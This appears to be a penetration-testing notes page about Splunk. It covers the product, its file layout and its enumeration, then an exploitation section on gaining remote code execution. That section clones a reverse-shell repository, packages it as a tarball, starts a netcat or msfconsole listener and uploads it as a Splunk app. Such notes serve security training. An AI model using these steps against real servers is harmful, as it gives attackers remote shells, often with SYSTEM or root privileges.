Skip to main content

Splunk

Splunk is a powerful log management, security information and event management (SIEM), and data analytics platform used for searching, monitoring, and analyzing machine-generated data. It is widely used for IT operations, security, and business analytics.

Tech Stack of Splunk

  • Backend: C++, Python
  • Frontend: HTML, CSS, JavaScript (Uses Django and SimpleXML for dashboards)
  • Database: Proprietary indexing-based storage (not a traditional RDBMS)
  • Server: Runs on Linux, Windows, macOS (uses its own web server but can integrate with Nginx, Apache)

File Structure

/splunk-root
│── bin/               # Executable scripts for starting/stopping Splunk  
│   ├── splunk         # Main Splunk CLI command (Linux/macOS)  
│   ├── splunk.exe     # Windows equivalent of Splunk CLI  
│   ├── splunkd        # Splunk daemon process  
│── etc/               # Configuration and settings files  
│   ├── system/        # Default system-wide configurations  
│   ├── apps/          # Installed Splunk apps (custom and third-party)  
│   ├── users/         # User-specific settings and preferences  
│   ├── auth/          # Authentication and user role settings  
│   ├── splunk-launch.conf # Startup configurations  
│── var/               # Runtime data and logs  
│   ├── log/           # Log files for Splunk operations (splunkd.log, web_service.log)  
│   ├── run/           # PID files and runtime process information  
│   ├── lib/           # Cached data and extracted files  
│   ├── spool/         # Incoming data before indexing  
│   ├── stats/         # Statistics and monitoring data  
│── share/             # Shared files (help docs, libraries, etc.)  
│── lib/               # Splunk libraries and dependencies  
│── include/           # Header files and API definitions  
│── deployment-apps/   # Apps deployed via Splunk deployment server  
│── scripts/           # Custom scripts for automation  
│── splunk.pid         # Process ID file for Splunk instance  
│── splunkd.log        # Main log file for Splunk daemon  
│── LICENSE            # Splunk license file  
│── README.txt         # Basic information about Splunk

Enumeration

  • Splunk is commonly hosted on Windows/Linux Servers, running as the SYSTEM/Root account.
  • We rarely see splunk deployed on external network by any company.
  • If Splunk is left in the infrastructure without updating, it automatically converts to the free version, which does not require authentication.
  • Nmap can identify the 'Splunkd httpd' service and the Splunk management port used for communication with the Splunk REST API.

Exploitation

RCE with Custom Application

We can create a custom application in Splunk that can run Python, Batch, Bash, or PowerShell scripts. In the case of Splunk running on Linux, we can use a Bash reverse shell script, or PowerShell if the target is a Windows server. However, we can also use Python (which comes pre-installed with Splunk) to ensure compatibility on both Linux and Windows servers.

Link: https://github.com/0xjpuff/reverse_shell_splunk

git clone https://github.com/0xjpuff/reverse_shell_splunk && cd reverse_shell_splunk/reverse_shell_splunk

## Edit the scripts eg: ps1 or python script depending on which we are using
## Once edited we can archive it with tarball
tar -cvzf ourfile.tar.gz reverse_shell_splunk

# Run Netcat or msfconsole's 'multi/handler' on the port we specified and
## We can go to Splunk and 'Install app from file' and upload the tarball file.